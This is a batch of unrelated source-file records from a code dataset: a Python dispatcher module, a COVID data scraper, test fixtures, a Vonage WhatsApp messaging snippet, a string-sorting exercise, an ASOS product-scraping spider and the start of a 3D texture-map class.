lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(self._dispatchs.new_child(), self._default, **self._attrs)\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(\n f\"renew {self.__class__.__name__}{tuple(attrs.keys())}\", extra={\"obj\": self}\n )\n return self.__class__(\n self._dispatchs, self._default, **{**self._attrs, **attrs}\n )\n\n def __len__(self):\n return len(self._dispatchs)\n\n def __repr__(self):\n ndispatchs = len(self._dispatchs)\n nattrs = len(self._attrs)\n return f\"<{self.__name__}{{ndispatchs={ndispatchs}, nattrs={nattrs}}}>\"\n\n def __str__(self):\n def toline(kv):\n k, v = kv\n v = str(v(\"\")).replace(\"\\n\", \"\\n \")\n if k == self._default:\n return f\"*{k} = {v}\"\n return f\" {k} = {v}\"\n\n dispatchs = _dict_to_str(\"dispatchs\", self._dispatchs, parser=toline)\n attrs = _dict_to_str(\"attrs\", self._attrs)\n if len(attrs) == 0:\n if len(self._dispatchs) == 0:\n return f\"{self.__name__}{{}}\"\n return f\"{self.__name__}{{{dispatchs}\\n}}\"\n return f\"{self.__name__}{{{dispatchs},\\n {attrs}\\n}}\"\n\n def __setitem__(self, key, dispatch):\n \"\"\"Registers a dispatch method (using `register` with default values)\n\n Parameters\n ----------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n \"\"\"\n self.register(key, dispatch)\n\n def __dir__(self):\n \"\"\"Return instances belonging to this object\"\"\"\n return list(self._dispatchs.keys()) + [\"renew\", \"register\"]\n\n def register(self, key, dispatch, default=False, overwrite=True):\n \"\"\"Register a dispatch class to this container\n\n Parameter\n ---------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n default : bool, optional\n if true, `dispatch` will be the default when requesting it\n overwrite : bool, optional\n if true and `key` already exists in the list of dispatchs, then\n it will be overwritten, otherwise a `LookupError` is raised.\n \"\"\"\n _log.info(\n f\"register {self.__class__.__name__}(key: {key})\", extra={\"obj\": self}\n )\n if key in self._dispatchs.maps[0] and not overwrite:\n raise LookupError(\n f\"{self.__class__.__name__} already has {key} registered (and overwrite is false)\"\n )\n self._dispatchs[key] = dispatch\n if default:\n self._default = key\n\n\nclass ErrorDispatcher(AbstractDispatcher):\n \"\"\"Faulty handler to ensure that certain operations are not allowed\n\n This may for instance be used with ``ClassDispatcher(instance_dispatcher=ErrorDispatcher)``\n to ensure that a certain dispatch attribute will never be called on an instance.\n It won't work on type_dispatcher due to not being able to call `register`.\n \"\"\"\n\n def __init__(self, obj, *args, **kwargs): # pylint: disable=W0231\n raise ValueError(\n f\"Dispatcher on {obj} must not be called in this way, see documentation.\"\n )\n\n\nclass MethodDispatcher(AbstractDispatcher):\n def __init__(self, method, dispatchs=None, default=None, obj=None, **attrs):\n super().__init__(dispatchs, default, **attrs)\n update_wrapper(self, method)\n\n # In python3 a method *always* have the __self__ key\n # In case the method is bound on a class.\n if obj is None:\n self._obj = getattr(method, \"__self__\", None)\n else:\n self._obj = obj\n\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self.__wrapped__,\n self._dispatchs.new_child(),\n self._default,\n self._obj,\n **self._attrs,\n )\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self.__wrapped__,\n self._dispatchs,\n self._default,\n self._obj,\n **{**self._attrs, **attrs},\n )\n\n def __call__(self, *args, **kwargs):\n _log.debug(f\"call {self.__class__.__name__}{args}\", extra={\"obj\": self})\n if self._default is None:\n return self.__wrapped__(*args, **kwargs)\n return self._dispatchs[self._default](self._obj, **self._attrs).dispatch(\n self.__wrapped__\n )(*args, **kwargs)\n\n def __getitem__(self, key):\n r\"\"\"Get method using dispatch according to `key`\"\"\"\n _log.debug(\n f\"__getitem__ {self.__class__.__name__},key={key}\", extra={\"obj\": self}\n )\n return self._dispatchs[key](self._obj, **self._attrs).dispatch(self.__wrapped__)\n\n __getattr__ = __getitem__\n\n\ndef _parse_obj_getattr(func):\n \"\"\"Parse `func` for all methods\"\"\"\n if func is None:\n # return common handler\n return getattr\n elif isinstance(func, str):\n # One can make getattr fail regardless of what to fetch from\n # the object\n if func == \"error\":\n\n def func(obj, key):\n raise AttributeError(\n f\"{obj} does not implement the '{key}' dispatcher, \"\n \"are you using it incorrectly?\"\n )\n\n return func\n raise NotImplementedError(\n f\"Defaulting the obj_getattr argument only accepts [error], got {func}.\"\n )\n return func\n\n\nclass ObjectDispatcher(AbstractDispatcher):\n \"\"\"A dispatcher relying on object lookups\n\n This dispatcher wraps a method call with lookup tables and possible defaults.\n\n Examples\n --------\n >>> a = ObjectDispatcher(lambda x: print(x))\n >>> class DoubleCall(AbstractDispatch):\n ... def dispatch(self, method):\n ... def func(x):\n ... method(x)\n ... method(x)\n ... return func\n >>> a.register(\"double\", DoubleCall)\n >>> a.double(\"hello world\")\n hello world\n hello world\n \"\"\"\n\n def __init__(\n self,\n obj,\n dispatchs=None,\n default=None,\n cls_attr_name=None,\n obj_getattr=None,\n **attrs,\n ):\n super().__init__(dispatchs, default, **attrs)\n self._obj = obj\n self._obj_getattr = _parse_obj_getattr(obj_getattr)\n self._cls_attr_name = cls_attr_name\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self._obj,\n dispatchs=self._dispatchs.new_child(),\n default=self._default,\n cls_attr_name=self._cls_attr_name,\n obj_getattr=self._obj_getattr,\n **self._attrs,\n )\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debug(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self._obj,\n dispatchs=self._dispatchs,\n default=self._default,\n cls_attr_name=self._cls_attr_name,\n obj_getattr=self._obj_getattr,\n **{**self._attrs, **attrs},\n )\n\n def __call__(self, **attrs):\n _log.debug(\n f\"call {self.__class__.__name__}{tuple(attrs.keys())}\", extra={\"obj\": self}\n )\n return self.renew(**attrs)\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}{{obj={self._obj!r}}}>\"\n\n def __str__(self):\n obj = str(self._obj).replace(\"\\n\", \"\\n \")\n # super() returns the super class, not the super-instance.\n # Hence we need to call the explicit function\n return super().__str__().replace(\"{\", f\"{{\\n {obj},\\n \", 1)\n\n def register(self, key, dispatch, default=False, overwrite=True, to_class=True):\n \"\"\"Register a dispatch class to this object and to the object class instance (if existing)\n\n Parameter\n ---------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n default : bool, optional\n this dispatch class will be the default on this object _only_.\n To register a class as the default class-wide, do this on the class\n variable.\n overwrite : bool, optional\n if true and `key` already exists in the list of dispatchs, then\n it will be overwritten, otherwise a `LookupError` is raised.\n to_class : bool, optional\n whether the dispatch class will also be registered with the\n contained object's class instance\n \"\"\"\n _log.info(\n f\"register {self.__class__.__name__}(key: {key})\", extra={\"obj\": self}\n )\n super().register(key, dispatch, default, overwrite)\n if to_class:\n cls_dispatch = getattr(self._obj.__class__, self._cls_attr_name, None)\n if isinstance(cls_dispatch, ClassDispatcher):\n cls_dispatch.register(key, dispatch, overwrite=overwrite)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def __getitem__(self, key):\n r\"\"\"Retrieve dispatched dispatchs by hash (allows functions to be dispatched)\"\"\"\n _log.info(\n f\"__getitem__ {self.__class__.__name__},key={key}\", extra={\"obj\": self}\n )\n return self._dispatchs[key](self._obj, **self._attrs)\n\n def __getattr__(self, key):\n \"\"\"Retrieve dispatched method by name, or if the name does not exist return a MethodDispatcher\"\"\"\n if key in self._dispatchs:\n _log.info(\n f\"__getattr__ {self.__class__.__name__},dispatch={key}\",\n extra={\"obj\": self},\n )\n return self._dispatchs[key](self._obj, **self._attrs)\n\n attr = self._obj_getattr(self._obj, key)\n if callable(attr):\n _log.info(\n f\"__getattr__ {self.__class__.__name__},method-dispatch={key}\",\n extra={\"obj\": self},\n )\n # This will also ensure that if the user calls immediately after it will use the default\n return MethodDispatcher(\n attr, self._dispatchs, self._default, self._obj, **self._attrs\n )\n _log.info(\n f\"__getattr__ {self.__class__.__name__},method={key}\", extra={\"obj\": self}\n )\n return attr\n\n\nclass TypeDispatcher(ObjectDispatcher):\n \"\"\"A dispatcher relying on type lookups\n\n This dispatcher may be called directly and will query the dispatch method\n through the type of the first argument.\n\n Examples\n --------\n >>> a = TypeDispatcher(\"a\")\n >>> class MyDispatch(AbstractDispatch):\n ... def dispatch(self, arg):\n ... print(arg)\n >>> a.register(str, MyDispatch)\n >>> a(\"hello world\")\n hello world\n \"\"\"\n\n def register(self, key, dispatch, default=False, overwrite=True, to_class=True):\n \"\"\"Register a dispatch class to this object and to the object class instance (if existing)\n\n Parameter\n ---------\n key : *any hashable*\n key used in the dictionary look-up for the dispatch class\n dispatch : AbstractDispatch\n dispatch class to be registered\n default : bool, optional\n this dispatch class will be the default on this object _only_.\n To register a class as the default class-wide, do this on the class\n variable.\n overwrite : bool, optional\n if true and `key` already exists in the list of dispatchs, then\n it will be overwritten, otherwise a `LookupError` is raised.\n to_class : bool, optional\n whether the dispatch class will also be registered with the\n contained object's class instance\n \"\"\"\n _log.info(\n f\"register {self.__class__.__name__}(key: {key})\", extra={\"obj\": self}\n )\n super().register(key, dispatch, default, overwrite, to_class=False)\n if to_class:\n cls_dispatch = getattr(self._obj, self._cls_attr_name, None)\n if isinstance(cls_dispatch, ClassDispatcher):\n cls_dispatch.register(key, dispatch, overwrite=overwrite)\n\n def __call__(self, obj, *args, **kwargs):\n # A call on a TypeDispatcher forces at least a single argument\n # where the type is being dispatched.\n\n # Figure out if obj is a class or not\n if isinstance(obj, type):\n typ = obj\n else:\n # If not, then get the type (basically same as obj.__class__)\n typ = type(obj)\n\n # if you want obj to be a type, then the dispatcher should control that\n _log.debug(f\"call {self.__class__.__name__}{args}\", extra={\"obj\": self})\n return self._dispatchs[typ](self._obj)(obj, *args, **kwargs)\n\n def __getitem__(self, key):\n r\"\"\"Retrieve dispatched dispatchs by hash (allows functions to be dispatched)\"\"\"\n _log.info(\n f\"__getitem__ {self.__class__.__name__},key={key}\", extra={\"obj\": self}\n )\n return self._dispatchs[key](self._obj, **self._attrs)\n\n\nclass ClassDispatcher(AbstractDispatcher):\n \"\"\"A dispatcher for classes, using `__get__` it converts into `ObjectDispatcher` upon invocation from an object, or a `TypeDispatcher` when invoked from a class\n\n This is a class-placeholder allowing a dispatcher to be a class attribute and converted into an\n `ObjectDispatcher` when invoked from an object.\n\n If it is called on the class, it will return a `TypeDispatcher`.\n\n This class should be an attribute of a class. It heavily relies on the `__get__` special\n method.\n\n Parameters\n ----------\n name : str\n name of the attribute in the class\n dispatchs : dict, optional\n dictionary of dispatch methods\n obj_getattr : callable, optional\n method with 2 arguments, an ``obj`` and the ``attr`` which may be used\n to control how the attribute is called.\n instance_dispatcher : AbstractDispatcher, optional\n control how instance dispatchers are handled through `__get__` method.\n This controls the dispatcher used if called from an instance.\n type_dispatcher : AbstractDispatcher, optional\n control how class dispatchers are handled through `__get__` method.\n This controls the dispatcher used if called from a class.\n\n Examples\n --------\n >>> class A:\n ... new = ClassDispatcher(\"new\", obj_getattr=lambda obj, attr: getattr(obj.sub, attr))\n\n The above defers any attributes to the contained `A.sub` attribute.\n \"\"\"\n\n def __init__(\n self,\n attr_name,\n dispatchs=None,\n default=None,\n obj_getattr=None,\n instance_dispatcher=ObjectDispatcher,\n type_dispatcher=TypeDispatcher,\n **attrs,\n ):\n # obj_getattr is necessary for the ObjectDispatcher to create the correct\n # MethodDispatcher\n super().__init__(dispatchs, default, **attrs)\n # the name of the ClassDispatcher attribute in the class\n self._attr_name = attr_name\n p = namedtuple(\"get_class\", [\"instance\", \"type\"])\n self._get = p(instance_dispatcher, type_dispatcher)\n\n self._obj_getattr = _parse_obj_getattr(obj_getattr)\n _log.info(f\"__init__ {self.__class__.__name__}\", extra={\"obj\": self})\n\n def copy(self):\n \"\"\"Create a copy of this object (making a new child for the dispatch lookup)\"\"\"\n _log.debug(f\"copy {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self._attr_name,\n self._dispatchs.new_child(),\n self._default,\n self._obj_getattr,\n self._get.instance,\n self._get.type,\n **self._attrs,\n )\n\n def renew(self, **attrs):\n \"\"\"Create a new class with updated attributes\"\"\"\n _log.debud(f\"renew {self.__class__.__name__}\", extra={\"obj\": self})\n return self.__class__(\n self._attr_name,\n self._dispatchs,\n self._default,\n self._obj_getattr,\n self._get.instance,\n self._get.type,\n **{**self._attrs, **attrs},\n )\n\n def __get__(self, instance, owner):\n \"\"\"Class dispatcher retrieval\n\n The returned class depends on the setup of the `ClassDispatcher`.\n\n If called on an instance, it will return a class ``self._get.instance``\n class object.\n\n If called on a class (type), it will return a class ``self._get.type``.\n\n If the returned class is None, it will return ``self``.\n \"\"\"\n if instance is None:\n inst = owner\n cls = self._get.type\n else:\n cls = self._get.instance\n if issubclass(cls, TypeDispatcher):\n inst = owner\n else:\n inst = instance\n _log.debug(\n f\"__get__ {self.__class__.__name__},instance={instance!r},inst={inst!r},owner={owner!r},cls={cls!r}\",\n extra={\"obj\": self},\n )\n if cls is None:\n return self\n return cls(\n inst,\n self._dispatchs,\n default=self._default,\n cls_attr_name=self._attr_name,\n obj_getattr=self._obj_getattr,\n **self._attrs,\n )\n\n\n'''\nFor use when doing cached dispatchers\nclass CachedClassDispatcher(ClassDispatcher):\n\n def __init__(self, name, dispatchs=None, default=None, obj_getattr=None, **attrs):\n # obj_getattr is necessary for the ObjectDispatcher to create the correct\n # MethodDispatcher\n super().__init__(dispatchs, default, **attrs)\n self._obj_getattr = _parse_obj_getattr(obj_getattr)\n # the name of the ClassDispatcher attribute in the class\n self._attr_name = name\n\n def __get__(self, instance, owner):\n \"\"\" Class dispatcher retrieval\n\n When directly retrieved from the class we return it-self to\n allow interaction with the dispatcher.\n\n When retrieved from an object it returns an `ObjectDispatcher`\n which contains the current dispatchs allowed to be dispatched through.\n \"\"\"\n if instance is None:\n return self\n dispatcher = ObjectDispatcher(instance, self._dispatchs,\n default=self._default,\n cls_attr_name=self._attr_name,\n obj_getattr=self._obj_getattr,\n **self._attrs)\n object.__setattr__(instance, self._attr_name, dispatcher)\n return dispatcher\n'''\n", "repo_name": "zerothi/sisl", "sub_path": "src/sisl/_dispatcher.py", "file_name": "_dispatcher.py", "file_ext": "py", "file_size_in_byte": 24590, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 155, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 43, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 100, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 123, "usage_type": "name"}, {"api_name": "collections.ChainMap", "line_number": 133, "usage_type": "argument"}, {"api_name": "collections.ChainMap", "line_number": 134, "usage_type": "call"}, {"api_name": "functools.update_wrapper", "line_number": 244, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 578, "usage_type": "call"}]} +{"seq_id": "4128000210", "text": "import requests\r\nfrom datetime import datetime\r\n\r\ndef catch_data():\r\n \"\"\"\r\n 抓取当前实时数据,并返回 国家、大洲、确诊、疑似、死亡、治愈 列表\r\n :return:\r\n \"\"\"\r\n url = 'https://api.inews.qq.com/newsqa/v1/automation/foreign/country/ranklist'\r\n data = requests.post(url).json()['data']\r\n\r\n date_list = list() # 日期\r\n name_list = list() # 国家\r\n continent_list = list() # 大洲\r\n confirm_list = list() # 确诊\r\n suspect_list = list() # 疑似\r\n dead_list = list() # 死亡\r\n heal_list = list() # 治愈\r\n\r\n for item in data:\r\n month, day = item['date'].split('.')\r\n date_list.append(datetime.strptime('2020-%s-%s' % (month, day), '%Y-%m-%d'))\r\n name_list.append(item['name'])\r\n continent_list.append(item['continent'])\r\n confirm_list.append(int(item['confirm']))\r\n suspect_list.append(int(item['suspect']))\r\n dead_list.append(int(item['dead']))\r\n heal_list.append(int(item['heal']))\r\n\r\n return date_list, name_list, continent_list, confirm_list, suspect_list, dead_list, heal_list\r\n\r\n\r\ndef save_csv():\r\n \"\"\"\r\n 将数据存入 csv 文件\r\n :return:\r\n \"\"\"\r\n date_list, name_list, continent_list, confirm_list, suspect_list, dead_list, heal_list = catch_data()\r\n fw = open('2019-nCoV.csv', 'w', encoding='utf-8')\r\n fw.write('date,name,continent,confirm,suspect,dead,heal\\n')\r\n\r\n i = 0\r\n while i < len(date_list):\r\n date = str(date_list[i].strftime(\"%Y-%m-%d\"))\r\n fw.write(date + ',' + str(name_list[i]) + ',' + str(continent_list[i]) + ',' + str(confirm_list[i]) + ',' + str(suspect_list[i]) + ',' + str(dead_list[i]) + ',' + str(heal_list[i]) + '\\n')\r\n i = i + 1\r\n else:\r\n print(\"csv 写入完成\")\r\n fw.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n save_csv()", "repo_name": "meteor1993/python-learning", "sub_path": "python-data-analysis/2019-nCoV-global/data_spider.py", "file_name": "data_spider.py", "file_ext": "py", "file_size_in_byte": 1861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 87, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.post", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "16361595659", "text": "import os\nimport sys\n\nimport pytest\nfrom bs4 import BeautifulSoup\n\n\nsys.path.insert(0, os.path.abspath('.'))\nsys.path.append(os.path.join(os.path.abspath('.'), 'habrpars'))\n\n\n@pytest.fixture\ndef page():\n path = os.path.abspath('.')\n filename = os.path.join(path, 'habrpars', 'fixtures', 'page.html')\n return filename\n\n\n@pytest.fixture\ndef page_raw_content(page):\n with open(page, 'r', encoding='utf-8') as handler:\n html_content = handler.read()\n return html_content\n\n\n@pytest.fixture\ndef page_content(page_raw_content):\n soup = BeautifulSoup(page_raw_content, 'html.parser')\n return soup\n", "repo_name": "mitrofun/habrpars", "sub_path": "habrpars/tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "19783792198", "text": "import os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\ndotenv_path = join(dirname(__file__), \"../../.env\")\nload_dotenv(dotenv_path)\n\nVONAGE_APPLICATION_ID = os.environ.get(\"VONAGE_APPLICATION_ID\")\nVONAGE_APPLICATION_PRIVATE_KEY_PATH = os.environ.get(\"VONAGE_APPLICATION_PRIVATE_KEY_PATH\")\n\nTO_NUMBER = os.environ.get(\"TO_NUMBER\")\nWHATSAPP_NUMBER = os.environ.get(\"WHATSAPP_NUMBER\")\n\nCATALOG_ID = os.environ.get('CATALOG_ID')\nPRODUCT_RETAILER_ID = os.environ.get('PRODUCT_RETAILER_ID')\n\nimport vonage\n\nclient = vonage.Client(\n application_id=VONAGE_APPLICATION_ID,\n private_key=VONAGE_APPLICATION_PRIVATE_KEY_PATH,\n)\n\nclient.messages.send_message(\n {\n 'to': TO_NUMBER,\n 'from': WHATSAPP_NUMBER,\n 'channel': 'whatsapp',\n 'message_type': 'custom',\n 'custom': {\n 'type': 'interactive',\n 'interactive': {\n 'type': 'product',\n 'body': {'text' 'Check out this cool product'},\n 'footer': {'text': 'Sale now on!'},\n 'action': {'catalog_id': CATALOG_ID, 'product_retailer_id': PRODUCT_RETAILER_ID},\n },\n },\n }\n)\n", "repo_name": "Vonage/vonage-python-code-snippets", "sub_path": "messages/whatsapp/send_product_message_single_item.py", "file_name": "send_product_message_single_item.py", "file_ext": "py", "file_size_in_byte": 1170, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "vonage.Client", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "44407360810", "text": "#Given a string, sort it in decreasing order based on the frequency of characters.\r\n#\r\n#Example 1:\r\n#\r\n#Input:\r\n#\"tree\"\r\n#\r\n#Output:\r\n#\"eert\"\r\n#\r\n#Explanation:\r\n#'e' appears twice while 'r' and 't' both appear once.\r\n#So 'e' must appear before both 'r' and 't'. Therefore \"eetr\" is also a valid answer.\r\n#Example 2:\r\n#\r\n#Input:\r\n#\"cccaaa\"\r\n#\r\n#Output:\r\n#\"cccaaa\"\r\n#\r\n#Explanation:\r\n#Both 'c' and 'a' appear three times, so \"aaaccc\" is also a valid answer.\r\n#Note that \"cacaca\" is incorrect, as the same characters must be together.\r\n#Example 3:\r\n#\r\n#Input:\r\n#\"Aabb\"\r\n#\r\n#Output:\r\n#\"bbAa\"\r\n#\r\n#Explanation:\r\n#\"bbaA\" is also a valid answer, but \"Aabb\" is incorrect.\r\n#Note that 'A' and 'a' are treated as two different characters.\r\n\r\nclass Solution(object):\r\n def frequencySort(self, s):\r\n from collections import Counter\r\n\r\n freq = Counter(s)\r\n pairs = [(count, c) for c, count in freq.items()]\r\n pairs.sort(reverse = True)\r\n\r\n result = []\r\n for count, c in pairs:\r\n result += [c] * count\r\n\r\n\r\n return( \"\".join(result))\r\n\r\n\r\n \r\n ", "repo_name": "nileshpaliwal/May-Leetcoding-Challenge-2020", "sub_path": "Sort Characters By Frequency.py", "file_name": "Sort Characters By Frequency.py", "file_ext": "py", "file_size_in_byte": 1098, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.Counter", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "73833926593", "text": "from scrapy import Spider, Request\nfrom asos.items import AsosItem\nimport re\nimport os.path\nimport urllib.request \n\n\nclass AsosSpider(Spider):\n\tname = 'asos_spider'\n\tallowed_urls = ['http://us.asos.com/women/']\n\tstart_urls = ['http://us.asos.com/women/dresses/cat/?cid=8799&nlid=ww|clothing|shop+by+product']\n\n\tdef parse(self, response):\n\t\t# Find the total number of pages in the result so that we can decide how many urls to scrape next\n\t\ttext = response.xpath('//p[@class=\"_2sxPqJf\"]/text()').extract_first()\n\t\tper_page, total1, total2 = map(lambda x: int(x), re.findall('\\d+', text))\n\t\tnumber_pages = round((total1*1000+total2)/per_page)\n\n\t\t# List comprehension to construct all the urls\n\t\tresult_urls = ['http://us.asos.com/women/dresses/cat/?cid=8799&nlid=ww|clothing|shop%20by%20product&page={}'.format(x) for x in range(1, number_pages)]\n\n\t\t# Yield the requests to different search result urls, \n\t\t# using parse_result_page function to parse the response.\n\t\tfor url in result_urls:\n\t\t\tyield Request(url=url, callback=self.parse_result_page)\n\n\n\tdef parse_result_page(self, response):\n\t\t# This fucntion parses the search result page.\n\t\t\n\t\tproducts = response.xpath('//a[@class=\"_3x-5VWa\"]')\n\t\t\n\t\tfor product in products:\n\t\t\tdetail_url = product.xpath('.//@href').extract_first() # We are looking for url of the detail page.\n\t\t\tprice = product.xpath('.//p/span[2]/text()').extract_first()\n\n\t\t# Yield the requests to the details pages, \n\t\t# using parse_detail_page function to parse the response.\n\t\t# carry the price down since price can't be scraped on item page\n\t\t\tyield Request(url=detail_url, meta={'price': price}, callback=self.parse_detail_page)\n\n\n\n\tdef parse_detail_page(self, response):\n\t\t# This fucntion parses the product detail page.\n\n\t\tproduct = response.xpath('//div[@class=\"product-hero\"]/h1/text()').extract_first()\n\t\tprice = response.meta['price']\n\t\tdescription = response.xpath('//div[@class=\"product-description\"]/span/ul/li/text()').extract()\n\t\tmaterial = response.xpath('//div[@class=\"about-me\"]/span//text()').extract()\n\t\tfront_img = 'https:'+ response.xpath('//img/@src')[7].extract()\t\t\t\t\t\t# front size image (already sized correctly)\n\t\tback_img = 'https:'+ response.xpath('//img/@src')[4].extract().split(\"?\")[0]\t\t# back side image (resized)\n\t\t\n\t\t# This is for extracting product image ################################\t\t\n\t\t\n\t\tfull_file_name_front = os.getcwd() + '/img_dress/' + re.split(\"\\/\", front_img)[-1] + '.jpg'\t\t# file path/name\n\t\turllib.request.urlretrieve(front_img, full_file_name_front)\t\t\t\t\t\t\t\t\t\t# download front img\n\t\t\n\t\tfull_file_name_back = os.getcwd() + '/img_dress/' + re.split(\"\\/\", back_img)[-1] + '.jpg'\t\t# file path/name\n\t\turllib.request.urlretrieve(back_img, full_file_name_back)\t\t\t\t\t\t\t\t\t\t# download back img\n\n\n\t\titem = AsosItem()\n\t\titem['product'] = product\n\t\titem['price'] = price\n\t\titem['description'] = description\n\t\titem['material'] = material\n\t\titem['front_img'] = front_img\n\t\titem['back_img'] = back_img\n\t\t\n\t\tyield item\n\n\n\n\n", "repo_name": "hlk217/capstone", "sub_path": "Final/WEB_SCRAP/asos/asos/spiders/asos_spider.py", "file_name": "asos_spider.py", "file_ext": "py", "file_size_in_byte": 2980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 8, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 16, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.getcwd", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "name"}, {"api_name": "re.split", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 57, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 57, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 57, "usage_type": "name"}, {"api_name": "os.path.getcwd", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}, {"api_name": "re.split", "line_number": 59, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 60, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 60, "usage_type": "name"}, {"api_name": "asos.items.AsosItem", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "24161363705", "text": "import pythreejs\nimport ipywidgets\nimport ipywidgets.embed\n\nfrom vis.viewer_base import *\n\n# Threejs apparently only supports square textures, so we need to add padding to rectangular textures.\n# The input UVs are assumed to take values in [0, 1]^2 where (0, 0) and (1, 1) are the lower left and upper right\n# corner of the original rectangular texture. We then adjust these texture\n# coordinates to map to the padded, square texture.\nclass TextureMap:\n # \"uv\" should be a 2D numpy array of shape (#V, 2)\n # \"tex\" should be a 3D numpy array of shape (h, w, 4)\n def __init__(self, uv, tex, normalizeUV = False, powerOfTwo = False):\n self.uv = uv.copy()\n\n # Make the parametric domain stretch from (0, 0) to (1, 1)\n if (normalizeUV):\n self.uv -= np.min(self.uv, axis=0)\n dim = np.max(self.uv, axis=0)\n self.uv /= dim\n\n h, w = tex.shape[0:2]\n 